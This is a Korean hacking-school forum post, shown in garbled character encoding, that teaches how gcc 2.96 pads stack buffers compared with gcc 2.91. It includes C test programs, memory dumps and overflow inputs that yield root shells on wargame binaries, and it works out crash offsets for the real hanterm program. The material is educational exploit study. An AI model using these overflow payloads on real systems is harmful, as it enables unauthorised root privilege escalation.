1581, 8/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ttongfly
   http://ttongfly.realskulls.org
   ¿øÀç¾Æºü´ÔÀÇ gcc 2.96¿¡¼­ÀÇ ¹öÆÛ ±¸Á¶ °­ÁÂ.

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=68 [º¹»ç]


Á¦°¡ ¾Æ·¡ ¿Ã¸° ¹®¼­µéÀÇ ´ëºÎºÐÀº gcc ÄÄÆÄÀÏ·¯ ¹öÁ¯ 2.95 ÀÌÇÏÀÇ
ȯ°æ¿¡ Àû¿ëµÇµµ·Ï ÀÛ¼ºµÈ °­ÁÂÀÔ´Ï´Ù. µû¶ó¼­ ¸¸¾à ¿©·¯ºÐÀÌ gcc 2.96
ÀÌ»óÀÇ ¹öÁ¯ÀÌ ¼³Ä¡µÈ ȯ°æ¿¡¼­ ¹öÆÛ ¿À¹öÇ÷ο츦 ½ÀÇϽ÷Á¸é ½ÇÁ¦
¹®¼­ ³»¿ë°ú Â÷ÀÌ°¡ ³ª´Â ºÎºÐÀÌ »ý±æ°Ì´Ï´Ù.
±×¿¡ µû¸¥ ÇØ°á ¹æ¹ý¿¡ ´ëÇؼ± ¾Æ·¡ ¹®¼­¸¦ º¸½Ã¸é ¾Ë ¼ö ÀÖÀ»°Å±¸¿ä.
ÃßõÇÏ´Â ÇнÀ ¹æ¹ýÀº gcc 2.95 ÀÌÇÏ ¹öÁ¯ÀÇ È¯°æ¿¡¼­ ¹öÆÛ ¿À¹öÇ÷ο츦
ÇнÀÇϽŠÈÄ ±× ´ÙÀ½ gcc 2.96 ÀÌ»óÀÇ ¹öÁ¯¿¡¼­ÀÇ Àû¿ë ¹æ¹ýÀ» ÀÍÈ÷´Â
°ÍÀÔ´Ï´Ù. Âü°í·Î F.T.ZÀº gcc 2.95 ÀÌÇÏÀÇ ¹öÁ¯À» »ç¿ëÇÏ°í ÀÖÀ¸¹Ç·Î
º¯°æµÈ ¹öÆÛ ±¸Á¶¿¡ ±¸¾Ö¹ÞÁö ¾Ê°í ÇнÀÇÏ½Ç ¼ö ÀÖ±¸¿ä. ÁýÀ̳ª ´Ù¸¥ ¼­¹ö¿¡¼­
ÇнÀÇϽ÷Á¸é ´ÙÀ½°ú °°Àº °úÁ¤À» °ÅÄ¡½Ã¸é ¿¹Àü ¹öÁ¯ÀÇ gcc¸¦ »ç¿ëÇÏ½Ç ¼ö
ÀÖ½À´Ï´Ù.

1. ³» ¼­¹öÀÇ gcc ¹öÁ¯ È®ÀÎ.
    [root@hancom root]# gcc -v
    Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
    gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
    [root@hancom root]#
    --> 2.96 ÀÌ»óÀ̱º¿ä.

2. ¾î¶² ÆÐÅ°Áö¿¡ gcc ÇÁ·Î±×·¥ÀÌ Æ÷ÇԵǾî ÀÖ´ÂÁö¸¦ È®ÀÎ.
    [root@hancom root]# rpm -qf /usr/bin/gcc
    gcc-2.96-99hl
    [root@hancom root]#
    --> ÀÌ ÆÐÅ°Áö¸¦ Á¦°ÅÇϸé gccµµ »ç¶óÁö°ÚÁÒ?

3. ÇØ´ç ÆÐÅ°Áö »èÁ¦.
    [root@hancom root]# rpm -e gcc-2.96-99hl --nodeps
    [root@hancom root]#

4. ÀÌÀü ¹öÁ¯ÀÇ gcc ¼³Ä¡( ÀÌÀü ¹öÁ¯ÀÇ gcc´Â egcs ÆÐÅ°Áö¿¡ Æ÷ÇԵǾî ÀÖÀ½. )

   [´Ù¿î·Îµå] <- egcs-1.1.2 ÆÐÅ°Áö

   <¼³Ä¡>
    [root@hancom egc]# rpm -ivh egcs-1.1.2-30.i386.rpm --nodeps --force
    Preparing...            ########################################### [100%]
    1:egcs                   ########################################### [100%]
    [root@hancom egc]#

5. È®ÀÎ
    [root@hancom egc]# gcc -v
    Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
    gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
    [root@hancom egc]#  
    --> ¿À¿¹ 2.91ÀÌ µÇ¾ú³×¿ä.
  
6. ´Ù½Ã ¿¹Àü ¹öÁ¯ÀÇ gcc¸¦ º¹±¸½ÃÅ°·Á¸é ¹Ý´ë·Î egcs¸¦ ¾ðÀνºÅçÇÑ ÈÄ  
   gcc-2.96.99hlÀ» ¼³Ä¡ÇÏ¸é µÇ°ÚÁÒ?
   [root@hancom egc]# rpm -e egcs-1.1.2-30 --nodeps
   [root@hancom egc]# mount /dev/cdrom
   [root@mongii /root]# rpm -ivh /mnt/cdrom/RedHat/RPMS/gcc-2.96-99hl.i386.rpm
   gcc                         ##################################################
   [root@hancom root]# gcc -v
   Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
   gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
   [root@hancom root]#

* ¿ó½º. ÇÑ°¡Áö ÀØ°í ÀÖ¾ú´ø°Ô Àֳ׿ä. ÀÌÀü ¹öÁ¯ÀÇ gcc¸¦ ¼³Ä¡ÇÏÁö ¾Ê°íµµ
  ÀÌÀü ¹öÁ¯ÀÇ ¹öÆÛ ±¸Á¶·Î ÄÄÆÄÀÏÇÏ´Â ¿É¼ÇÀÌ µû·Î ÀÖ½À´Ï´Ù.
  ex) gcc -o test test.c -mpreferred-stack-boundary=2
  À§ÀÇ ¿É¼ÇÀ» »ç¿ëÇϸé 2.96 ¹öÁ¯ ÀÌ»óÀÇ gcc¿¡¼­µµ 2.95ÀÌÇÏÀÇ ¹öÆÛ
  ¸ð¾çÀ¸·Î ÄÄÆÄÀÏ ÇÒ ¼ö ÀÖ½À´Ï´Ù. Å×½ºÆ® ȤÀº °ø°³ ÇØÅ· ¼­¹ö¸¦ ¸¸µå½Ã°Å³ª
  ¸Å¹ø ¿É¼ÇÀ» »ç¿ëÇÏ´Â °ÍÀÌ ºÒÆíÇÏ½Ç ¶§ ¸ÕÀú ¼³¸íµå¸° ¹æ¹ýÀ» ÀÌ¿ëÇϼ¼¿ä.


---------------------------------------------------------------------------

GCC ¹öÁ¯ 2.96¿¡¼­ buf±¸Á¶                                      -. hackerleon in Null@Root

·¹µåÇò 7.0 ÀÌ»ó¹öÁ¯¿¡¼­´Â gcc2.96À» ü¿ëÇÏ°íÀÖ´Ù.
gcc2.96·Î ÄÄÆÄÀÏµÈ ÇÁ·Î±×·¥ÀÇ°æ¿ì ¹öÆÛ±¸Á¶°¡ º¯ÇüµÇ´Â°ÍÀ» º¼¼ö Àִµ¥..
À̹ø ±Û¿¡¼­´Â gcc2.96¿¡¼­ÀÇ ¹öÆÛ±¸Á¶¸¦ ÆÄÈ®Çغ¸°íÁ® ÇÑ´Ù.

¾ó¸¶Àü Á¦ ȨÆäÀÌÁö¿¡¼­ ÇÁ·¹ÀÓ Æ÷ÀÎÅÍ¿¡ °üÇÑ »çÇ×Áß gcc¹öÀü 2.96¿¡¼­ ¹®Á¦Á¡¿¡ °üÇÑ ¿¬±¸±ÛÀ» NaNu9´Ô ¿Ã·ÁÁÖ½ÅÀûÀÌ ÀÖ¾ú´Ù^^°¨»ç!!..±× ¿¬±¸ °á°ú¸¦ Åäµ¥·Î ±âÁ¸ÀÇ Ãë¾àÇÁ·Î±×·¥¿¡ Àû¿ë½Ã ¾î¶°ÇÑ ÇüÅ·ΠÀû¿ëµÇ¸ç, gcc 2.96¿¡¼­ ¸Þ¸ð¸® ±¸Á¶´Â ¾î¶°ÇÑ°¡¸¦ ¾Ë¾Æº¸°í BOF³ª FSB¿¡ Àû¿ëÇÒ¼ö ÀÖ´Â ¹æ¹ýÀ» ¾Ë¾Æº¸°íÀÚ ÇÑ´Ù.
¿ì¼± http://hackerleon.cybersoldier.net ÀÇ Q&A¶õÀÇ 470¹ø ±ÛÀ» ÂüÁ¶ÇÏ¿© ±âº» ÀüÁ¦·Î ÇÑ´Ù

´ÙÀ½ÀÇ µ¿ÀÏÇÑ ¼Ò½º¸¦ °¢°¢ gcc 2.91°ú 2.96¿¡¼­ ÄÄÆÄÀÏÇØ º¸µµ·Ï ÇÏÀÚ.


//test1.c
#include "dumpcode.h"
#include

main()
{ char buf2[12];
char buf[20];
fgets(buf,128,stdin);
printf("buf1:%x , buf2:%x, %d\n",buf,buf2,buf2-buf);
dumpcode((char*)buf,64);
}

test1À» ÅëÇØ gcc 2.96°ú gcc 2.91·Î °¢°¢ ÄÄÆÄÀÏµÈ ÇÁ·Î±×·¥ÀÇ ¸Þ¸ð¸® ±¸Á¶¸¦ º¸·Á°í ÇÑ´Ù.
¿ì¼± gcc 2.91¿¡¼­ÀÇ °á°úÀÌ´Ù.

$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
$ gcc test1.c -o test1
$./test1
a
buf1:bffffa98 , buf2:bffffaac, 20
0xbffffa98  61 0a 00 40 34 97 04 08 60 ae 00 40 04 fb ff bf   a..@4...`..@....
0xbffffaa8  b8 fa ff bf 4b 84 04 08 20 97 04 08 34 97 04 08   ....K... ...4...
0xbffffab8  d8 fa ff bf cb 29 03 40 01 00 00 00 04 fb ff bf   .....).@........
0xbffffac8  0c fb ff bf 68 38 01 40 01 00 00 00 b0 83 04 08   ....h8.@........


À§ÀÇ °á°ú´Â ¿ì¸®°¡ ¾ÆÁÖ ¸¹À̺Á¿Ô±¸..´ç¿¬ÇÑ °á°ú ÀÌ´Ù..µµ½ÄÀûÀ¸·Î º¸¸é

[buf(20)][buf2(12)][ebp(4)][ret]

¾ÆÁÖ dump¸¦ ¾ÈÇغÁµµ °£´ÜÇÏ°Ô À¯Ãß°¡ °¡´É ÇÏ´Ù.

±×·³ À̹ø¿¡´Â gcc 2.96¿¡¼­ÀÇ °á°úÀÌ´Ù.

$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$gcc test1.c -o test1
$./test1
a
buf1:bfffefa0 , buf2:bfffefc0, 32
0xbfffefa0  61 0a 00 40 a8 ca 13 40 44 f0 ff bf ce 6b 12 40   a..@...@D....k.@
0xbfffefb0  e8 ef ff bf 20 d0 00 40 50 83 04 08 a8 ca 13 40   .... ..@P......@
0xbfffefc0  44 f0 ff bf 44 63 01 40 e8 ef ff bf d1 84 04 08   D...Dc.@........
0xbfffefd0  18 98 04 08 fc 98 04 08 18 f0 ff bf fc bb 03 40   ...............@

À̹øÀÇ °á°ú´Â ¾ÆÁÖ À̻󽺷´´Ù. buf¿¡¼­ buf2±îÁöÀÇ °Å¸®°¡ 32byte·Î ³ª¿Ô±¸..
¸Þ¸ð¸®±¸Á¶¸¦ º¸¾Æµµ ¾ÆÁÖ À̻󽺷¯¿î ¹è¿­À» ÇÏ°í ÀÖ´Ù..µµ½ÄÀûÀ¸·Î º¸¸ç

[buf(20)][dummy1(12)][buf2(12)][dummy2(4)][dummy3(8)][ebp(4)][ret]

¸Þ¸ð¸® »çÀÌ»çÀÌ ¸¶´Ù dummy(-ÀÓÀÇ·Î ¸íÇÔ-)µéÀÌ µé¾î°¡´Â °ÍÀ» º¼¼ö ÀÖ´Ù..

ÀÌ·¸µí gcc 2.96¿¡¼­´Â ¸Þ¸ð¸®ÀÇ ±¸Á¶¸¦ ÆÄÈ®Çϱ⠾î·Æ°Ô µÇ¾îÀִµ¥...
½É½ÉÇÑ ¿©¸§Àú³á ÇÒÀϵµ ¾ø°í Çؼ­ ¾à°£ÀÇ ³ë°¡´Ù¸¦ Çغ»°á°ú Àç¹ÌÀÖ´Â ±ÔÄ¢¼ºÀ» ¾Ë¾Æ³»°Ô µÇ¾ú´Ù.

test1¿¡ buf¿Í buf2ÀÇ Å©±â¸¦ º¯°æÇØ°¡¸ç buf¿¡¼­ buf2±îÁöÀÇ °Å¸®¸¦ °è»êÇØ º¸¾Ò´Ù.

[http://hackerleon.cybersoldier.net/images/gcc296.jpg]

- Ç¥1ÂüÁ¶ -

Ç¥1¿¡¼­ º¸¸é.. (Á¤¸» ÇÒÀÏ ¾ø¾ú³ªº¸´Ù^^)
bufÀÇ Å©±â°¡ 16ÀÇ ¹è¼ö·Î ³ª°¡°í ù16¹è¼ö ÀÌÈĺÎÅÍ ´ÙÀ½ 16¹è¼ö ±îÁö´Â buf2°¡ 12byteÀÌ»óÀÏ°æ¿ì ´ÙÀ½16¹è¼ö °ªÀÌ °Å¸®·Î ³ª¿À´Â°ÍÀ» º¼¼ö ÀÖ´Ù..
Áï...test1¿¡¼­ º¸¸é..buf °¡ 20¹ÙÀÌÆ®À̹ǷΠ16 < buf <= 32 ¹üÀ§¿¡ ÀÖ°í µû¶ó¼­ buf2¿ÍÀÇ °Å¸®´Â "32" ÀΰÍÀÌ´Ù.

±×·³ ÀÓÀÇ·Î buf°ªÀ» Á¤ÇÏ°í buf2±îÁöÀÇ °Å¸®¸¦ °è»êÇغ¸ÀÚ..
buf=200
buf2=12
¿¡¼­ 16x12=192, 16x13=208 À̹ǷΠ192 < buf <= 208 ¹üÀ§¿¡ ÀÖ´Ù µû¶ó¼­ À§ÀÇ ¾ÆÀ̵ð¾î°¡ ¸Â´Ù¸é °Å¸®´Â 208ÀÌ ³ª¿Í¾ß ÇÒ°ÍÀÌ´Ù.

À½...À̾ÆÀ̵ð¾î°¡ ¸Â´ÂÁö bufÀÇ Å©±â¸¦ º¯°æÇÏ¿© ½ÃÇàÇÏ¿©º¸ÀÚ

//test2.c
#include

main()
{ char buf2[12];
char buf[200];
fgets(buf,224,stdin);
printf("buf1:%x , buf2:%x, %d\n",buf,buf2,buf2-buf);
}

$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$gcc test2.c -o test2
$./test2
a
buf1:bfffeef0 , buf2:bfffefc0, 208

¿ª½Ã ¾ÆÀ̵ð¾î°¡ ¸Â¾Ò´Ù...

±×·³ ¿ì¸° gcc 2.96¿¡¼­µµ ¼Ò½º¿¡¼­ º¯¼öÀÔ·ÂÁ¦ÇÑÀÌ ¾ø´Ù¸é Ãë¾àÇÁ·Î±×·¥ÀÇ ¸Þ¸ð¸®±¸Á¶¸¦ À¯ÃßÇÏ¿© °ø·«À» ÇÒ¼ö ÀÖ°Ú´Ù...^^

´ãÀº buf2¿¡¼­ ret±îÁöÀÇ ¸ð¾çÀ» º¸µµ·Ï ÇÏÀÚ..

test1¿¡¼­ÀÇ °á°ú

[buf(20)][dummy1(12)][buf2(12)][dummy2(4)][dummy3(8)][ebp(4)][ret]

ÀÌ·¸°Ô »ý°Ü¸ÔÀº °ÍÀ» º¸¾Ò´Ù..¾Õ¼­ buf¿¡¼­ buf2»çÀÌÀÇ dummyÀÇ ±æÀÌ´Â ¾Ë¾Æº¸¾Ò°í...buf2¿¡¼­ ret±îÁöÀÇ °Å¸®¿¡ ´ëÇؼ­µµ ¾Ë¾Æº¸ÀÚ...

¿ª½Ã ¸¶Ã®°¡ÁöÀεí ÇÏ´Ù..^^

test3¸¦ º¸ÀÚ

//test3.c

main()
{ char buf[20];
fgets(buf,64,stdin);
dumpcode((char*)buf,64);
}

$./test3
a
0xbfffefb0  61 0a 00 bf 20 d0 00 40 50 83 04 08 a8 ca 13 40   a... ..@P......@
0xbfffefc0  44 f0 ff bf 44 63 01 40 e8 ef ff bf d1 84 04 08   D...Dc.@........
0xbfffefd0  d0 97 04 08 b4 98 04 08 18 f0 ff bf fc bb 03 40   ...............@
0xbfffefe0  01 00 00 00 44 f0 ff bf 4c f0 ff bf 66 83 04 08   ....D...L...f...

¿©±â¼­ gdb·Î ret¸¦ ¾Ë¾Æº»°á°ú ret°ªÀÌ 0x4003bbfc ·Î ³ª¿Ô´Ù µû¶ó¼­
ret´Â 0xbfffefdc ÀÌ´Ù.
¿©±â¼­µµ ¾Õ¼­ °è»êÇÑ°Í°ú °°ÀÌ buf2ÀÇ Å©±â°¡ 16ÀÇ ¹è¼öÀÇ ¹üÀ§¿¡¼­ ÃÖ´ë°ªÀ» ±âÁØÀ¸·Î dummy°¡ »ý¼ºµÈ´Ù´Â°ÍÀ» ¾Ë¼ö ÀÖ´Ù..

buf°¡ 20 À̹ǷΠ16 < buf <= 32 ¹üÀ§¿¡ ÀÖ°í µû¶ó¼­ buf¿¡¼­ dummy3±îÁöÀÇ °Å¸®´Â 32ÀΰÍÀÌ´Ù.

Á¤¸®Çغ¸¸é

[buf(20) ----> 32(20+12)][dummy3(8)][ebp(4)][ret]

À¸ÇÏÇÏ...ret±îÁöÀÇ °Å¸®µµ °è»êÇÏ¿© À¯Ãß°¡ °¡´É ÇÏ´Ù...


±×·³ ½ÇÀü BOF¹®Á¦¸¦ gcc 2.96¿¡¼­ ÄÄÆÄÀÏ Çغ¸°í ¿ì¸®°¡ »ý°¢ÇÑ °ÍÀÌ ¸Â´Â°¡¸¦ È®ÀÎÇغ¸µµ·Ï ÇÏÀÚ.

//test4.c
#include

void printit() {
printf("Hello there!\n");
}

main()
{ int crap;
void (*call)()=printit;
char buf[20];
fgets(buf,50,stdin);
setreuid(0,0);
call();
}

¾î¼­ ¸¹ÀÌ º¸µç ¼Ò½ºÀÌ´Ù^^(mainsourece newbie13¹ø ¹®Á¦)

gcc 2.96¿¡¼­¸é buf(20)µÚ¿¡ printitÀ» callÇÏ´Â ÁÖ¼Ò°¡ ³ª¿À¹Ç·Î..egg¸¦ ¶ç¿ì°í [20][egg] ¸¦ ÀÔ·ÂÇÏ¸é ¹Ù·Î shellÀ» ȹµæ ÇÒ¼ö ÀÖ¾ùÀ» °ÍÀÌ´Ù...
±×·³ gcc 2.96À¸·Î ÄÄÆÈµÈ ³ÑÀº ¾î¶»°Ô ÇÒ±î...À§¿¡¼­ °øºÎ Çѵ¥·Î..

¿ì¼± bufÀÇ Å©±â°¡ 20 À̹ǷΠ16 < buf <=32 ¹üÀ§ÀÌ´Ù µû¶ó¼­ buf¿¡¼­ dummy3±îÁöÀÇ °Å¸®´Â 32 ÀÌ´Ù..
dummy3ÀÇ Å©±â´Â À§¿¡¼­ º¸¾ÒµíÀÌ 8byte À̹ǷΠprintit À» callÇÏ´Â ÁÖ¼Ò±îÁöÀÇ °Å¸®´Â 32+8 = 40 ¹ÙÀÌÆ® ÀμÀÀÌ´Ù.

µû¶ó¼­ °ø°Ý ¹æ¹ýÀº [40][egg]°¡ µÇ°Ú´Ù.. ¸Â³ª »ìÆ캸µµ·Ï ÇÏÀÚ.

egg:0xbffffa78

$(printf "AAAA...(40)\x78\xfa\xff\xbf";cat)\./test4

id
uid=500(leon) gid=(500)leon euid=0(root)

µÈ´Ù...

±×·³ À̹ø¿¡´Â ¸®ÅϾîµå·¹½º¸¦ º¯Á¶ÇÏ´Â ¹®Á¦¸¦ Ç®¾îº¸ÀÚ.

//test5.c
#include
main()
{
       char buf[20];
       printf("name :");
       fgets(buf,50,stdin);
       printf("Hi %s",buf);
}
¸¶Ã¯°¡Áö·Î 2.91¿¡¼­´Â egg¸¦ ¶ç¿îÈÄ [20][ebp][ret]À̹ǷÎ...
°ø°ÝÀº [24][&egg] ÇϸéµÉ°ÍÀÌ´Ù. ±×·¯³ª 2.96¿¡¼± À§¿¡¼­¿Í °°ÀÌ Àû¿ëÇÒ°æ¿ì.
buf°¡ 20¹ÙÀÌÆ®À̹ǷΠ16 < buf < 32 µû¶ó¼­ buf¿¡¼­ dummy3±îÁöÀÇ °Å¸®´Â 32¹ÙÀÌÆ®ÀÌ°í dummy3´Â 8¹ÙÀÌÆ® sfp 4¹ÙÀÌÆ® °á°ú..

[20[12][8][4] => [44¹ÙÀÌÆ®][egg] ·Î °ø°ÝÀ» ÇØ¾ß ÇÒ°ÍÀÌ´Ù.±×·³..

egg:0xbffffa78

$(printf "AAAA...(44)\x78\xfa\xff\xbf";cat)\./test4

id
uid=500(leon) gid=(500)leon euid=0(root)

¶Ç µÈ´Ù^^.

±×·³ À̹ø¿¡´Â ³»Ä£±è¿¡ »ó¿äÇÁ·Î±×·¥ÀÇ ¿À·ù´ë¸í»ç "hanterm"¿¡ Àû¿ëÇغ¸ÀÚ.

ÀÏ´Ü gcc 2.91¿¡¼­´Â

$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
$hanterm -fn `perl -e "print 'a'x88"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~Áß·«~aaaaaaa
¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù

88¹ÙÀÌÆ®¿¡¼­ ¼¼±×¿À·ù°¡ ³µÀ¸¸ç Áï, [84][fsb][ret] ÀÓÀ» À¯ÃßÇÏ¿© °ø°ÝÇÒ¼ö ÀÖ´Ù.

±×·³ 2.96¿¡¼­´Â...¾î¶»°Ô µÉ±î.. ¹öÆÛ¸¦ À¯ÃßÇغ¸ÀÚ..
ÀÏ´Ü -fn¿É¼ÇÀÇ º¯¼ö(ÀÓÀÇ·Î 'buf'¶óÇÏÀÚ)Å©±â°¡ 84¹ÙÀÌÆ®À̹ǷÎ..

16x5=80 < buf < 16x6=96

µû¶ó¼­, buf¿¡¼­ dummy3±îÁöÀÇ °Å¸®´Â 96¹ÙÀÌÆ®ÀÌ´Ù.±×·¯¹Ç·Î

[96][8][4][ret] ¶ó´Â °è»êÀÌ ³ª¿Â´Ù.. Áï, 108¿¡¼­ ÃÖÃÊ ¼¼±×¿À·ù°¡ ³ª¾ßÇÒ°ÍÀÌ´Ù. ±×·³ Á¤¸» ±×·±Áö..

$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)

$hanterm -fn `perl -e "print 'a'x107"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~Áß·«~aaaaaaaaaaaaaaaa

$hanterm -fn `perl -e "print 'a'x108"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~Áß·«~aaaaaaaaaaaaaaaaa
¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù

¿¹»óÇÞ´ø µ¥·Î±º¿ä...^^
µû¶ó¼­ 2.96ÇÏÀÇ hanterm¿ª½Ã °ø°ÝÇÒ¼ö°¡ ÀÖ°Ù½À´Ï´Ù.


¸î°¡Áö ¿¹Á¦¸¦ ÅëÇؼ­ ¿ì¸®´Â gcc 2.96¿¡¼­µµ ¸Þ¸ð¸®ÀÇ »ó´ëÀû À§Ä¡¸¦ À¯Ãß ÇÒ¼ö ÀÖ°Ô µÇ¾ú´Ù...

±×·¯³ª ¿©±â¼­..

¾ÆÁÖ Áß¿äÇÑ Á¡ Çϳª°¡ ÀÕ´Ù..

Áï, fgetsÀÇ ÀÔ·ÂÇѵµ¸¦ ÀÛ°Ô ÀâÀ¸¸é ¿À¹ö¸¦ ÇÒ¼ö ¾ø´Ù´Â Á¡ÀÌ´Ù.

µû¶ó¼­ gcc 2.96¿¡¼­´Â ´ÙÀ½°ú °°ÀÌ Á¤¸®ÇÒ¼ö ÀÖ´Ù.

1. º¯¼ö1°ú º¯¼ö2 °£°Å¸®´Â º¯¼ö1ÀÌ 16ÀÇ ¹è¼öÁß ÃÖ´ë°ª ¸¸Å­ ÀÌ´Ù.(´Ü, º¯¼ö2°¡ 12¹ÙÀÌÆ® ÀÌ»óÀÏ°æ¿ì)

2. º¯¼öÁ¤ÀÇ°¡ ³¡³ª´Â °÷Àº dummy3(8byte)°¡ ÇÒ´çµÈ´Ù.

3. º¯¼ö ÀԷ¹üÀ§¸¦ º¯¼ö°¡ ¼ÓÇÏ´Â 16¹è¼ö ÃÖ´ë°ª ÀÌÇÏ·Î ÇÒ°æ¿ì BOF·ÎÀÎÇÑ ¹ö±×´Â ÀϾÁö ¾Ê´Â´Ù.


¾î¼ö¼± ÇÏ°Ô gcc2.96¿¡¼­ÀÇ Ãë¾à ÇÁ·Î±×·¥ÀÇ Àû¿ëÀ» ¾Ë¾Æº¸¾Ò´Ù..

gcc 2.96¿¡¼­ ÄÄÆÄÀÏµÈ FSBÀÇ ret°ª °è»êÀ̳ª..BOF retã±âµî¿¡ À¯¿ëÇÒ°Í °°±¸ Á»´õ ¸¹Àº ¿¬±¸°¡ ÀÌ·ç¾î Áö¸é ÁÁ°Ú´Ù...

  Hit : 13122     Date : 2003/09/19 11:46



    
Farcen ¾Æ... ¾î·Æ³×¿ä... dumpcode.h ¸ÕÀú ÀÌÇظ¦ ÇؾßÇÒµí 2003/09/21  
wonjae190 ¿øÀç¾Æºü....,¤Ñ.¤Ñ ¾Æºü! 2003/10/15  
allnude hanterm -fn 'perl -e "print 'a'x88"' ÀÔ·ÂÇϸé À­±Û´ë·Î ¾È³ª¿À°í can't load english font perl -e "print ax88" ÀÌ·¸°Ô 2003/12/03  
allnude ³ª¿É´Ï´Ù. ¿Ö ±×·±°¡¿ä? ÇöÀç ¿Í¿ì¸®´ª½º7.3ÀÌ°í gcc´Â 2.95.4ÀÔ´Ï´Ù. 2.91ÇÏ°í ¶È°°Àº °á°ú°¡ ³ª¿É´Ï´Ù. 2003/12/03  
allnude ¹°·Ð egg´Â ½ÇÇàÇß±¸¿ä.. (ÀÌ°÷ 47¹ø) 2003/12/03  
tinlove21 Á¤¸» ÀßÀоú½À´Ï´Ù. °í¸¶¿ö¿ä ¤» ÁÁÀºÁ¤º¸ÀÔ´Ï´Ù µµ¿ò ¸¹ÀÌ µÇ¾ú¾î¿ä^^ 2005/01/11  
kim0237 ÈåÀ½... ¸®´ª½º ¸¾¿¡ Á¤¸» µé¾î ¤Ñ.¤Ì 2006/06/19  
cjy9306 À¹ ¾Æ¹«¸®ºÁµµ ³ª´Â ¸ð¸£°Í³×.. 2010/01/07  
chlckdghsla ¸ð¸£°Í´Ù...¤Ð¤Ð¾îµð¼­ºÎÅʹٽðøºÎ¸¦ÇؾßÇÏÁö 2012/09/21  
1441   ³×Æ®¿öÅ© °³³ä ÈÖ¾îÀâ±â 4[14]     ¼ÒÀ¯
09/13 13220
1440   ³×Æ®¿öÅ© °³³ä ÈÖ¾îÀâ±â 3[17]     ¼ÒÀ¯
09/12 13215
1439   * À©µµ¿ì ÇØÅ·ÀÇ ±âº» ¿ø¸®*[29]     oes2
08/26 13189
  ¿øÀç¾Æºü´ÔÀÇ gcc 2.96¿¡¼­ÀÇ ¹öÆÛ ±¸Á¶ °­ÁÂ.[9]     ttongfly
09/19 13121
1437   [802.11] How to Crack WPA[6]     DCos
02/17 13092
1436   [802.11] How to Attack WiFi Phishing??[2]     DCos
02/27 13089
1435   [Project] Àü±â,ÀüÀÚ »ó½Ä ¹× »þÇÁ½ÉÀ¸·Î Àü±¸¸¸µé±â. - 3[16]     ¾ÆÀÌÇÁ¸®µå
02/03 13086
1434   °³ÀÎÁ¤º¸ ÀÌ¿ë³»¿ª ÅëÁöÁ¦µµ¶õ     HongMK900
08/13 13067
1433   [Á¤¸®] ÇØÄð °­ÁÂ½Ç ³»¿ë 14~48pÁö Á¤¸®[7]     W.H.
03/13 12970
1432   À©µµ¿ì ¸í·É¾î[12]     whqkdnf000
10/26 12908
1431   ¹è¿­ ³»¿¡¼­ ·£´ýÇÑ n°³ ÃßÃâÇϱâ[2]     kjwon15
12/05 12899
1430   [Æß]Ptrace¸¦ ÀÌ¿ëÇÑ Àç¹Ì´Â ÇØÅ·.[4]     ^^
02/08 12887
1429   "ÇØÄ¿°¡ µÇ·Á¸é ¹«¾ùÀ» ¾Ë¾Æ¾ß Çϳª¿ä?" ÀÇ ´äº¯(¹ßÃé)[48]     mati
08/01 12880
1428   Sendmail ¼Ò½º·Î ¼³Ä¡Çϱâ[1]     h41d35
09/12 12869
1427   ³×Æ®¿öÅ© °³³ä ÈÖ¾îÀâ±â 5[10]     ¼ÒÀ¯
09/14 12865
1426   3¹ø°c°­ÁÂÀÔ´Ï´Ù~¤»[8]     ±«µµjs
07/14 12857
1425   ±¸±Û ÇØÅ·?[7]     nsh009
11/06 12854
1424   [Æß]½º´ÏÇÎ[1]     loveaaav
03/24 12845
1423   [C±âÃÊ] 11 - ÇÔ¼ö ¸Å°³º¯¼ö·Î ¹è¿­À» ³Ñ±â·Á¸é?      sihun1113
05/01 12819
1422   [ÀÚÀÛ] W's ¾ÏÈ£ÇÐ(Cryptology) - ½ºÆĸ£Åº ¾ÏÈ£,½ÃÀú(¾ËÆĺªÄ¡È¯)¾ÏÈ£[11]     williamlee
07/28 12795
[1][2][3][4][5][6][7] 8 [9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org